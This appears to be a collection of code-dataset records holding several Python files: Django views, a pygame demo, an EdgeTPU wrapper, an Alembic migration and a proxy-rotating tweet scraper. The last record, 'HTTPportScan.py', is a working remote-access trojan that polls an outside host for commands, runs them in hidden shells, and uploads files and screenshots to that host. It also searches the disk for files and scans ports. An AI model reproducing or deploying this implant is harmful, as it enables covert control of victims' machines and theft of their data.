"roadies.handlers.Handler", "line_number": 82, "usage_type": "argument"}, {"api_name": "unittest.mock.patch", "line_number": 85, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 85, "usage_type": "name"}, {"api_name": "tests.myapp.models.Foo", "line_number": 86, "usage_type": "call"}, {"api_name": "unittest.mock.patch", "line_number": 91, "usage_type": "call"}, {"api_name": "unittest.mock", "line_number": 91, "usage_type": "name"}, {"api_name": "django.db.models.signals.post_save.disconnect", "line_number": 98, "usage_type": "call"}, {"api_name": "tests.myapp.models.test_handler", "line_number": 98, "usage_type": "argument"}, {"api_name": "django.db.models.signals.post_save", "line_number": 98, "usage_type": "name"}]} {"seq_id": "12735096", "text": "from django.conf.urls import url\nfrom django.contrib.auth.views import LoginView, LogoutView\n\nfrom main.views import RegistrationView, 
EmailVerificationView\n\nurlpatterns = [\n url(r'^accounts/registration/$', RegistrationView.as_view(), name='registration'),\n url(r'^accounts/email_verification/?(?P[a-z0-9\\-]+)?/$',\n EmailVerificationView.as_view(), name='email_verification'),\n url(r'^accounts/login/$', LoginView.as_view(), name='login'),\n url(r'^accounts/logout/$', LogoutView.as_view(), name='logout'),\n]\n", "sub_path": "main/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 535, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "main.views.RegistrationView.as_view", "line_number": 7, "usage_type": "call"}, {"api_name": "main.views.RegistrationView", "line_number": 7, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "main.views.EmailVerificationView.as_view", "line_number": 9, "usage_type": "call"}, {"api_name": "main.views.EmailVerificationView", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView.as_view", "line_number": 10, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView", "line_number": 10, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView.as_view", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView", "line_number": 11, "usage_type": "name"}]} {"seq_id": "625522327", "text": "from django.shortcuts import render_to_response\nfrom django.db.models import Q\nfrom django.core.context_processors import csrf\nfrom django.http import HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nfrom usuarios.models import *\nfrom gestion_cuestionarios.forms import *\nfrom django.template import RequestContext\n\n\nfrom cuestionarios.models import Cuestionario\n\n\n\ndef view_lista_cuestionarios(request):\n permisos={}\n if \"user\" in request.COOKIES:\n id=int(request.COOKIES.get(\"user\", ''))\n usuario=User.objects.get(id=id)\n userpermisos=UserPermisos.objects.get(user=usuario.id)\n permisos['issueper']=usuario.is_superuser\n permisos['isadmin']=userpermisos.admin\n permisos['issup']=userpermisos.supervisor\n permisos['isexp']=userpermisos.experto\n if userpermisos.experto: \n cuestionarios=Cuestionario.objects.filter(user=id)\n cuestionariosactivos=Cuestionario.objects.filter(~Q(pk__in=cuestionarios)& Q(activo=True))\n contexto = {'cuestionarios': cuestionarios, 'permisos':permisos, 'cuestionarios_activos':cuestionariosactivos, 'user':usuario, 'userid':id}\n elif userpermisos.supervisor:\n cuestionarios=Cuestionario.objects.all()\n contexto = {'cuestionarios': cuestionarios, 'permisos':permisos, 'user':usuario, 'userid':id}\n else:\n cuestionarios=Cuestionario.objects.filter(activo=True)\n contexto = {'cuestionarios_activos': cuestionarios, 'permisos':permisos, 'user':usuario, 'userid':id}\n mensaje=''\n \n if \"mensaje\" in request.COOKIES:\n mensaje=request.COOKIES.get(\"mensaje\", '')\n contexto['mensaje']=mensaje\n response=render_to_response(r'gestion_cuestionarios/lista_cuestionarios.html',RequestContext(request, contexto))\n response.delete_cookie(\"mensaje\")\n return response\n else:\n return HttpResponseRedirect('/')\n\ndef view_nuevo_cuestionario(request):\n if \"user\" in 
request.COOKIES:\n        userid=int(request.COOKIES.get(\"user\", ''))\n        if request.method==\"POST\":\n            form = CuestionarioForm(request.POST)\n            if form.is_valid():\n                cuestionario=Cuestionario()\n                cuestionario.nombre=form.cleaned_data['nombre']\n                cuestionario.descripcion=form.cleaned_data['descripcion']\n                cuestionario.user_id=userid\n                cuestionario.activo=False\n                cuestionario.save()\n                return HttpResponseRedirect(reverse(view_lista_cuestionarios))\n        else:\n            form = CuestionarioForm()\n        contexto={'form':form}\n        contexto.update(csrf(request))\n        return render_to_response(r'gestion_cuestionarios/nuevo_cuestionario.html',contexto)\n    return HttpResponseRedirect('/')\n    \ndef view_eliminar_cuestionario(request):\n    if 'idcuestionario' in request.GET: \n        cuest_id = request.GET['idcuestionario']\n        cuestionario = Cuestionario.objects.get(pk=cuest_id)\n        cuestionario.delete()\n    return HttpResponseRedirect(reverse(view_lista_cuestionarios))\n\ndef view_activar_desc_cuestionarios(request, id):\n    cuestionario=Cuestionario.objects.get(pk=id)\n    cuestionario.activo=not cuestionario.activo\n    cuestionario.save()\n    return HttpResponseRedirect(reverse(view_lista_cuestionarios))\n    \n", "sub_path": "gestion_cuestionarios/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 3379, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "cuestionarios.models", "line_number": 26, "usage_type": "name"}, {"api_name": "cuestionarios.models.Cuestionario.objects.filter", "line_number": 26, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "cuestionarios.models.Cuestionario", "line_number": 26, "usage_type": "name"}, {"api_name": "cuestionarios.models.Cuestionario.objects.filter", "line_number": 27, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "cuestionarios.models.Cuestionario", "line_number": 27, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 27, "usage_type": "call"}, {"api_name": "cuestionarios.models", "line_number": 27, "usage_type": "name"}, {"api_name": "cuestionarios.models", "line_number": 28, "usage_type": "name"}, {"api_name": "cuestionarios.models", "line_number": 30, "usage_type": "name"}, {"api_name": "cuestionarios.models.Cuestionario.objects.all", "line_number": 30, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cuestionarios.models.Cuestionario", "line_number": 30, "usage_type": "name"}, {"api_name": "cuestionarios.models", "line_number": 31, "usage_type": "name"}, {"api_name": "cuestionarios.models", "line_number": 33, "usage_type": "name"}, {"api_name": "cuestionarios.models.Cuestionario.objects.filter", "line_number": 33, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario.objects", "line_number": 33, "usage_type": "attribute"}, {"api_name": "cuestionarios.models.Cuestionario", "line_number": 33, "usage_type": "name"}, {"api_name": "cuestionarios.models", "line_number": 34, "usage_type": "name"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 40, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 40, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 44, "usage_type": "call"}, {"api_name": 
"cuestionarios.models.Cuestionario", "line_number": 52, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 58, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 58, "usage_type": "call"}, {"api_name": "django.core.context_processors.csrf", "line_number": 62, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 63, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 64, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario.objects.get", "line_number": 69, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario.objects", "line_number": 69, "usage_type": "attribute"}, {"api_name": "cuestionarios.models.Cuestionario", "line_number": 69, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 71, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 71, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario.objects.get", "line_number": 74, "usage_type": "call"}, {"api_name": "cuestionarios.models.Cuestionario.objects", "line_number": 74, "usage_type": "attribute"}, {"api_name": "cuestionarios.models.Cuestionario", "line_number": 74, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 77, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 77, "usage_type": "call"}]} {"seq_id": "267671113", "text": "import pygame\nfrom pygame import font \nimport os\nbundle_dir = sys._MEIPASS\nimport sys\n#from images import *\n\n\npygame.init()\nx = pygame.font.get_fonts()\nfor fnts in x:\n\tif fnts == 'freesandsbold':\n\t\tprint (\"found it\")\n\nblack = (0,0,0)\n\ntextBoxImage = pygame.image.load(bundle_dir + '/images/sideMenuBox.png')\t\nlargeText = pygame.font.Font(bundle_dir + '/fonts/FreeSansBold.ttf',25)\nhldtext = \"Press Z to quit\"\n\nclock = pygame.time.Clock()\ngameDisplay = pygame.display.set_mode((800,600)) \n\ndisplaying = True\n\ndef text_objects(text, font):\n\ttextSurface = font.render(text, True, black)\n\treturn textSurface, textSurface.get_rect()\n\n#largeText = pygame.font.Font('freesansbold.ttf',25)\n\n\nwhile displaying:\n\tfor event in pygame.event.get():\n\t\tif event.type == pygame.KEYUP and event.key == pygame.K_z:\n\t\t\tdiplaying = False\n\t\t\tsys.exit()\n\t\t\tpygame.quit()\n\t\t\t#quit()\n\t\t\n\n\n\tgameDisplay.fill((255, 255, 255))\n\n\tgameDisplay.blit(textBoxImage, (550,1))\t\n\tBottomSurf, BottomRect = text_objects(hldtext, largeText)\n\tBottomRect.center = ((200),(370))\n\tgameDisplay.blit(BottomSurf, BottomRect)\n\tpygame.display.flip()\n\tclock.tick(15)\n\n\t\n", "sub_path": "pyIn/pygametest1/test1.py", "file_name": "test1.py", "file_ext": "py", "file_size_in_byte": 1121, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "pygame.init", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.font.get_fonts", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 21, 
"usage_type": "call"}, {"api_name": "pygame.time", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.font.render", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 27, "usage_type": "name"}, {"api_name": "pygame.event.get", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 35, "usage_type": "attribute"}, {"api_name": "pygame.K_z", "line_number": 35, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.quit", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.display.flip", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 49, "usage_type": "attribute"}]} {"seq_id": "40481667", "text": "\"\"\"Modified EdgeTPU classes for ease of use.\"\"\"\nimport logging\nfrom edgetpu.detection.engine import DetectionEngine # pylint: disable=import-error\n\nfrom edgetpu_server.models.candidate import LabeledDetectionCandidate\n\n_LOGGER = logging.getLogger(__name__)\n\n\n# pylint: disable=too-few-public-methods\nclass DetectionFilter:\n \"\"\"Detection filter data.\"\"\"\n\n def __init__(self, threshold, labels, labels_to_report):\n _LOGGER.warn('Initializing detection engine')\n self.threshold = threshold\n self.labels = labels\n self.labels_to_report = labels_to_report\n\n def filter_candidates(self, candidates):\n \"\"\"Filter the detection engine results.\"\"\"\n filtered_candidates = []\n for result in candidates:\n label = self.labels.get(result.label_id, None)\n if not label or label not in self.labels_to_report:\n continue\n filtered_candidates.append(LabeledDetectionCandidate(label, result))\n\n return filtered_candidates\n\n\nclass FilteredDetectionEngine(DetectionEngine):\n \"\"\"Detection engine that filters detected objects.\"\"\"\n\n def __init__(\n self,\n detection_filter,\n model_path,\n detection_lock,\n device_path=None):\n \"\"\"\n Args:\n model_path (str): Path to a TensorFlow Lite (``.tflite``) file.\n This model must be `compiled for the Edge TPU\n `_; otherwise, it simply executes\n on the host CPU.\n device_path (str): The device path for the Edge TPU this engine should use. This argument\n is needed only when you have multiple Edge TPUs and more inference engines than\n available Edge TPUs. 
For details, read `how to use multiple Edge TPUs\n `_.\n\n Raises:\n ValueError: If the model's output tensor size is not 4.\n \"\"\"\n _LOGGER.warn('Initializing filtered detection engine')\n DetectionEngine.__init__(self, model_path, device_path)\n self._filter = detection_filter\n self._detection_lock = detection_lock\n\n def filtered_detect_with_image(self, image):\n \"\"\"Perform object detection on an image and passed through the filter criteria.\"\"\"\n self._detection_lock.acquire()\n try:\n return self._filter.filter_candidates(\n self.detect_with_image(\n image,\n threshold=self._filter.threshold / 100,\n keep_aspect_ratio=True,\n relative_coord=False\n )\n )\n finally:\n self._detection_lock.release()\n", "sub_path": "edgetpu_server/detection_engine.py", "file_name": "detection_engine.py", "file_ext": "py", "file_size_in_byte": 2766, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "logging.getLogger", "line_number": 7, "usage_type": "call"}, {"api_name": "edgetpu_server.models.candidate.LabeledDetectionCandidate", "line_number": 27, "usage_type": "call"}, {"api_name": "edgetpu.detection.engine.DetectionEngine", "line_number": 32, "usage_type": "name"}, {"api_name": "edgetpu.detection.engine.DetectionEngine.__init__", "line_number": 56, "usage_type": "call"}, {"api_name": "edgetpu.detection.engine.DetectionEngine", "line_number": 56, "usage_type": "name"}]} {"seq_id": "205781738", "text": "\"\"\"full datetime\n\nRevision ID: 144649a54955\nRevises: 305ace38cf61\nCreate Date: 2015-10-15 15:03:12.623726\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '144649a54955'\ndown_revision = '305ace38cf61'\nbranch_labels = None\ndepends_on = None\n\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\ntry:\n from config import DATABASE_URL\nexcept:\n from configdist import DATABASE_URL\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n if DATABASE_URL[:5] == 'mysql':\n op.alter_column('media', 'created_at', type_=mysql.DATETIME(fsp=6), nullable=True)\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! 
###\n    if DATABASE_URL[:5] == 'mysql':\n        op.alter_column('media', 'created_at', type_=mysql.DATETIME(fsp=6), nullable=True)\n    ### end Alembic commands ###\n", "sub_path": "reactgur/migrations/versions/144649a54955_full_datetime.py", "file_name": "144649a54955_full_datetime.py", "file_ext": "py", "file_size_in_byte": 908, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "configdist.DATABASE_URL", "line_number": 26, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 27, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 27, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.mysql.DATETIME", "line_number": 27, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 27, "usage_type": "name"}, {"api_name": "configdist.DATABASE_URL", "line_number": 33, "usage_type": "name"}, {"api_name": "alembic.op.alter_column", "line_number": 34, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 34, "usage_type": "name"}, {"api_name": "sqlalchemy.dialects.mysql.DATETIME", "line_number": 34, "usage_type": "call"}, {"api_name": "sqlalchemy.dialects.mysql", "line_number": 34, "usage_type": "name"}]} {"seq_id": "250162369", "text": "# Script to scrape, download and store twitter data into a MongoDB database. The data will be used to feed ML algorithms and perform sentiment, spam and other analyses.\n# A modified version of GetOldTweets3 library is used. A .10 sec sleep timer is added to avoid exceeding normal twitter API request limits. We want to not abuse our calls :).\n# Script run time depends on the span from the start date to the current date, but the average time to return 1000 tweets for one day is 40 seconds.\nimport GetOldTweets3 as tweetory\nimport mongoengine as mongo\nfrom tweet import Tweet\nimport datetime\nfrom argparse import ArgumentParser\nfrom dateutil.relativedelta import *\nfrom time import time\nimport requests\nimport random\n\n# stores data into a Schema and saves it into MongoDB. The data is the typical tweet data that can be gathered from scraping like username, likes, retweets etc... Additionally we use Textblob to store the sentiment on the tweet.\n# We're storing sentiment now because even when we do the spam classification we still want the sentiment as extra information. Spam is still data!\n\n\ndef store_data(tweet_list):\n    for tweet in tweet_list:\n        chirp = Tweet()\n        chirp.tweet_id = tweet.id\n        chirp.permalink = tweet.permalink\n        chirp.date = tweet.date\n        chirp.username = tweet.username\n        chirp.author_id = tweet.author_id\n        chirp.tweet = tweet.text\n        chirp.retweets = tweet.retweets\n        chirp.likes = tweet.favorites\n        chirp.comments = tweet.comments\n        chirp.mentions = tweet.mentions\n        chirp.hashtags = tweet.hashtags\n        chirp.cashtags = tweet.cashtags\n        chirp.urls = tweet.urls\n        try:\n            chirp.save()\n        except Exception as e:\n            print(\"ERROR: \", e)\n            continue\n        print(\"Saved...\")\n\n\ndef get_proxy(previous=\"\", proxies=[]):\n    if not proxies:\n        with open(\"proxy-list.txt\") as f:\n            proxies = f.read().splitlines()\n\n    proxy = proxies[random.randrange(len(proxies))]\n\n    if proxy == previous:\n        return get_proxy(previous, proxies)\n    return proxy\n\n\nif (__name__ == \"__main__\"):\n    parser = ArgumentParser(\n        description=\"Stores cryptocurrency related tweets into a MongoDB database.\")\n    parser.add_argument(\n        \"--max\", type=int, help=\"Value for maximum number of tweets to be returned per day. 
Default 1000.\", default=1000)\n parser.add_argument(\n \"--start\", type=str, help=\"Start date to retrieve tweets from in ISO format YYYY-MM-DD. Default: 2015-01-01\", default=\"2015-01-01\")\n parser.add_argument(\n \"--end\", type=str, help=\"End date to retrieve tweets up to in ISO format YYYY-MM-DD. Default: Today non inclusive.\", default=datetime.date.today().isoformat())\n parser.add_argument(\n \"--keywords\", type=str, help=\"Keywords to be used for searching\", nargs=\"*\",\n default=[\"bitcoin\", \"altcoin\", \"cryptocurrency\", \"blockchain\", \"DAO\", \"dApp\", \"decentralized app\", \"digital asset\", \"cryptotokens\", \"cryptoassets\", \"masternode\", \"proof of stake\", \"proof of work\", \"pump and dump\", \"satoshi\", \"satoshi nakamoto\", \"shilling\", \"solidity\", \"the dao\", \"tokenized\",\n \"digital economy\", \"crypto whale\", \"white paper\", \"airdrop\"])\n parser.add_argument(\n \"--db\", type=str, help=\"Databse name to be used in mongoDB\", default=\"crypto-twitter\")\n\n arguments = parser.parse_args()\n\n print(\"Welcome to Crypto Tweet Historical Database!\")\n\n try:\n print(f\"Connecting to MongoDb server {arguments.db}...\")\n mongo.connect(arguments.db)\n except Exception as e:\n print(\"Failed to connect to MongoDB server...\")\n print(\"ERROR: \", e)\n print(\"Exiting...\")\n exit()\n else:\n print(\"Connected...\")\n\n try:\n start_date = datetime.datetime.strptime(\n arguments.start, \"%Y-%m-%d\").date()\n end_date = datetime.datetime.strptime(arguments.end, \"%Y-%m-%d\").date()\n\n except Exception as e:\n print(\"Received start and end dates were not parsable. ISO format(YYYY-MM-DD) required\")\n exit()\n\n date_delta = relativedelta(days=+1)\n max_tweets = arguments.max\n search = arguments.keywords\n proxy = get_proxy()\n\n print(\n f\"Starting tweet retrieval from {start_date.isoformat()} to {end_date.isoformat()}. {max_tweets} per day per search term. For {len(search)} search terms.\")\n print(f\"Using proxy:{proxy}\")\n # For each term loop through each day and pull the historical data by scraping twitter data using GetOldTweets3 library. Requests are throttled via a 0.10 sec sleep so as not to ever exceed standard twitter\n # API limits. Average time to retrieve 1000 tweets per each day is 39sec. You can estimate the time in seconds to completion: (start_date - today_date) * 39sec/1000tweet * len(search_terms).\n for term in search:\n while (start_date != end_date):\n since = start_date.isoformat()\n until = (start_date + date_delta).isoformat()\n\n print(\n f\"Retrieving tweets for keyword {term.upper()} between {since} and {until}.\")\n print(f\"Using proxy:{proxy}\")\n\n tweetCriteria = tweetory.manager.TweetCriteria().setQuerySearch(\n term).setSince(since).setUntil(until).setMaxTweets(max_tweets).setLang(\"en\")\n t0 = time()\n try:\n tweet_list = tweetory.manager.TweetManager.getTweets(\n tweetCriteria=tweetCriteria, proxy=proxy)\n except Exception as e:\n print(\"Failed in retrieving tweets...\")\n print(\"ERROR: \", e)\n print(\"Changing proxy...\")\n proxy = get_proxy(proxy)\n print(\"Retrying last search..\")\n print(\n f\"Retrieving tweets for keyword {term.upper()} between {since} and {until}\")\n t0 = time()\n try:\n tweet_list = tweetory.manager.TweetManager.getTweets(\n tweetCriteria=tweetCriteria, proxy=proxy)\n except Exception as e:\n print(\"Failed in retrieving tweets...\")\n print(\"ERROR: \", e)\n else:\n print(\n f\"{len(tweet_list)} tweets retrieved in {time() - t0} seconds. Storing into database . . 
.\")\n store_data(tweet_list)\n start_date = start_date + date_delta\n else:\n print(\n f\"{len(tweet_list)} tweets retrieved in {time() - t0} seconds. Storing into database . . .\")\n store_data(tweet_list)\n start_date = start_date + date_delta\n print(\"Changing proxy...\")\n proxy = get_proxy(proxy)\n\n print(\n f\"Retrieved tweets stored for {term.upper()}...\\nContinuing...\\n\")\n # reset start_date back to original value if not the while loop will not initiate do to a false condition being met.\n start_date = datetime.datetime.strptime(\n arguments.start, \"%Y-%m-%d\").date()\n print(\"Changing proxy...\")\n proxy = get_proxy(proxy)\n print(\"All search terms saved...\\nExiting...\\nGoodbye.\")\n", "sub_path": "CreateDatabase/create-db.py", "file_name": "create-db.py", "file_ext": "py", "file_size_in_byte": 7233, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "tweet.Tweet", "line_number": 20, "usage_type": "call"}, {"api_name": "tweet.id", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tweet.permalink", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tweet.date", "line_number": 23, "usage_type": "attribute"}, {"api_name": "tweet.username", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tweet.author_id", "line_number": 25, "usage_type": "attribute"}, {"api_name": "tweet.text", "line_number": 26, "usage_type": "attribute"}, {"api_name": "tweet.retweets", "line_number": 27, "usage_type": "attribute"}, {"api_name": "tweet.favorites", "line_number": 28, "usage_type": "attribute"}, {"api_name": "tweet.comments", "line_number": 29, "usage_type": "attribute"}, {"api_name": "tweet.mentions", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tweet.hashtags", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tweet.cashtags", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tweet.urls", "line_number": 33, "usage_type": "attribute"}, {"api_name": "random.randrange", "line_number": 47, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 55, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 62, "usage_type": "attribute"}, {"api_name": "mongoengine.connect", "line_number": 76, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 86, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 86, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 88, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 88, "usage_type": "attribute"}, {"api_name": "GetOldTweets3.manager.TweetCriteria", "line_number": 113, "usage_type": "call"}, {"api_name": "GetOldTweets3.manager", "line_number": 113, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 115, "usage_type": "call"}, {"api_name": "GetOldTweets3.manager.TweetManager.getTweets", "line_number": 117, "usage_type": "call"}, {"api_name": "GetOldTweets3.manager", "line_number": 117, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 127, "usage_type": "call"}, {"api_name": "GetOldTweets3.manager.TweetManager.getTweets", "line_number": 129, "usage_type": "call"}, {"api_name": "GetOldTweets3.manager", "line_number": 129, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 136, "usage_type": "call"}, {"api_name": "time.time", "line_number": 141, 
"usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 150, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 150, "usage_type": "attribute"}]} {"seq_id": "423701732", "text": "import requests\r\nimport subprocess\r\nimport time\r\nimport os\r\nimport random\r\nimport socket\r\nfrom PIL import ImageGrab as imagegrab\r\nimport tempfile\r\nimport shutil\r\n\r\ndef subprocess_args(include_stdout=True):\r\n shell = True\r\n if hasattr(subprocess, 'STARTUPINFO'):\r\n si = subprocess.STARTUPINFO()\r\n si.dwFlags |= subprocess.STARTF_USESHOWWINDOW\r\n env = os.environ\r\n else:\r\n si = None\r\n env = None\r\n if include_stdout:\r\n ret = {'stdout': subprocess.PIPE}\r\n else:\r\n ret = {}\r\n ret.update({'stdin': subprocess.PIPE,\r\n 'stderr': subprocess.PIPE,\r\n 'startupinfo': si,\r\n 'env': env,\r\n 'shell': shell})\r\n return ret\r\n\r\ndef changeDirectory(directory):\r\n os.chdir(directory)\r\n requests.post(url = 'http://192.168.0.10',data = ('[+] CWD is ' + os.getcwd()))\r\n\r\ndef grabfile(path):\r\n if os.path.exists(path):\r\n rpath = os.path.realpath(path)\r\n url = 'http://192.168.0.10/store'\r\n files = {'file': open(path, 'rb'),'path': rpath}\r\n r = requests.post(url, files=files)\r\n else:\r\n post_response = requests.post(url='http://192.168.0.10',data='[-] Not able to find the file.')\r\n\r\ndef takescreenshot():\r\n dirpath = tempfile.mkdtemp()\r\n path = dirpath + '\\img.jpg'\r\n imagegrab.grab().save(path, \"JPEG\")\r\n url = 'http://192.168.0.10/store'\r\n files = {'file': open(path, 'rb'),'path': 'screencap.jpg'}\r\n r = requests.post(url, files=files)\r\n files['file'].close()\r\n shutil.rmtree(dirpath)\r\n\r\ndef search(path,ext):\r\n list = ''\r\n for dirpath, dirname, files in os.walk(path):\r\n for file in files:\r\n if file.endswith(ext):\r\n list = list + '\\n' + os.path.join(dirpath,file)\r\n requests.post(url='http://192.168.0.10',data=list)\r\n\r\ndef scanner(ip,ports):\r\n scan_result = ''\r\n for port in ports.split(','):\r\n try:\r\n sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n output = sock.connect_ex((ip,int(port)))\r\n\r\n if output == 0:\r\n scan_result = scan_result + \"[+] Port \" + port + \" is open.\\n\"\r\n else:\r\n scan_result = scan_result + \"[+] Port \" + port + \" is closed or the host is not reachable.\\n\"\r\n sock.close()\r\n except Exception as e:\r\n pass\r\n requests.post(url='http://192.168.0.10',data=scan_result)\r\n \r\ndef connect():\r\n while True:\r\n req = requests.get('http://192.168.0.10')\r\n command = req.text\r\n\r\n if \"terminate\" in command:\r\n return 1\r\n elif 'cd ' in command:\r\n code,directory = command.split()\r\n changeDirectory(directory)\r\n elif 'grab' in command:\r\n grab,path = command.split(\" * \")\r\n grabfile(path)\r\n elif 'screencap' in command:\r\n takescreenshot()\r\n elif 'search' in command:\r\n command = command[7:]\r\n print(command)\r\n path,ext = command.split('*')\r\n search(path,ext)\r\n elif 'scan' in command:\r\n command = command[5:]\r\n ip,ports = command.split(':')\r\n scanner(ip,ports)\r\n else:\r\n CMD = subprocess.Popen(command,**subprocess_args(True))\r\n post_response = requests.post(url='http://192.168.0.10', data=CMD.stdout.read())\r\n post_response = requests.post(url='http://192.168.0.10', data=CMD.stderr.read())\r\n\r\n time.sleep(3)\r\n\r\ndef main():\r\n while True:\r\n try:\r\n if connect() == 1:\r\n break\r\n except:\r\n sleep_for = random.randrange(1,10)\r\n time.sleep(sleep_for) #Sleep for a random time between 1 
and 10 seconds\r\n #time.sleep(sleep_for * 60) #Sleep for a random time between 1 and 10 minutes\r\n pass\r\n \r\nmain()\r\n", "sub_path": "3/HTTPportScan.py", "file_name": "HTTPportScan.py", "file_ext": "py", "file_size_in_byte": 3905, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "subprocess.STARTUPINFO", "line_number": 14, "usage_type": "call"}, {"api_name": "subprocess.STARTF_USESHOWWINDOW", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 16, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 21, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 24, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 32, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 33, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "requests.post", "line_number": 40, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 42, "usage_type": "call"}, {"api_name": "tempfile.mkdtemp", "line_number": 45, "usage_type": "call"}, {"api_name": "PIL.ImageGrab.grab", "line_number": 47, "usage_type": 